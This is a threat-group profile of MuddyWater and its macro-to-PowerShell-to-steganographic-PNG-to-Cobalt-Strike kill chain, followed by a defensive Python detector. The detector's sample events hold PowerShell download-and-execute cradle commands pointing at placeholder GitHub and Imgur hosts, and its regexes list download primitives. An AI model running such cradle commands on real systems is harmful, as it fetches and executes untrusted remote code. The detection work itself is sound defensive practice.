MuddyWater

(AKA Seedworm and TEMP.Zagros)

MuddyWater (AKA Seedworm and TEMP.Zagros) is an Iranian threat group that primarily targets the Middle East, but also Europe and North America. The group's victims are mainly in the telecommunications, government (IT services) and oil sectors.

Its latest campaign deploys an extremely complex kill chain in which the malware is initially delivered via a Word file with an embedded macro. When the macro is executed, it launches PowerShell, which downloads and executes a PowerShell script from GitHub. That script then downloads a PNG file from the image hosting service Imgur and, through steganography, the pixel values of the image are decoded into a Cobalt Strike script that connects to the command-and-control server to receive further instructions.
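As an added, defender-side example that is not part of the original profile, the Python routine below turns the kill-chain characteristics described above (an Office parent spawning PowerShell, a download cradle, public code or image hosting used for staging, a PNG fetched by PowerShell) into tags over process-creation events. The events, hostnames and file paths are constructed placeholders, not indicators taken from this page.

```python
import re

# Constructed sample process-creation events (parent image, image, command line),
# shaped like the chain described above. URLs and paths are placeholders, not IoCs.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/stage.ps1')"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c (New-Object Net.WebClient).DownloadFile("
                "'https://i.imgur.com/EXAMPLE.png', 'C:\\Users\\Public\\img.png')"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},  # benign admin task
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Common PowerShell download-and-execute primitives.
CRADLE = re.compile(r"\b(downloadstring|downloadfile|invoke-webrequest|iwr|iex|invoke-expression)\b", re.I)
# Public code / image hosting the described campaign used for staging.
STAGING_HOSTS = re.compile(r"\b(raw\.githubusercontent\.com|github\.com|imgur\.com)\b", re.I)
IMAGE_FILE = re.compile(r"\.png\b", re.I)

def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event):
    """Return the ordered list of detection tags that fire for one event."""
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    tags = []
    if image not in POWERSHELL:
        return tags
    if parent in OFFICE_PARENTS:
        tags.append("office_spawned_powershell")      # macro -> PowerShell hop
    if CRADLE.search(cmd):
        tags.append("powershell_download_cradle")     # remote script fetched or executed
    if STAGING_HOSTS.search(cmd):
        tags.append("public_hosting_staging")         # GitHub / Imgur as stage host
    if IMAGE_FILE.search(cmd):
        tags.append("powershell_fetched_image")       # PNG carrier for the next stage
    return tags

def triage(events):
    """Index and tags of every event that fired at least one detection."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]

if __name__ == "__main__":
    for idx, tags in triage(SAMPLE_EVENTS):
        print(idx, ", ".join(tags))
```

Events that accumulate several tags, or a PowerShell parent whose own parent was an Office process, are the ones worth correlating across the full chain rather than alerting on in isolation.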
